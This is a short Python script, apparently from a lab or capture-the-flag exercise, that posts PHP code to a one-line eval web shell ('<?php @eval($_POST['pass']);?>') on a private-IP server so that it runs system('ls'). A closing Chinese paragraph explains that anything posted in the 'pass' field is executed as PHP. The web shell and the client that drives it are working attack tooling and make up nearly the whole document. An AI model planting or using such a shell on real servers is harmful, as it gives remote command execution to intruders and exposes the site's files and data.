import requests
url="http://10.2.0.113"
shell='/system.php'
passwd="pass"
port='80'
payload={
passwd:'system(\'ls \');'
}
url1=url+':'+port+shell
print(url1)
response=requests.post(url1,payload,timeout=1)
print(response.text)
原理是在<?php @eval($_POST['pass']);?>这样的一句话木马中,通过给pass这个值赋予内容会在eval中被解析成php进行执行,只要通过post将php语法赋予pass就能在php环境中被执行,这里执行的是ls查看文件列表。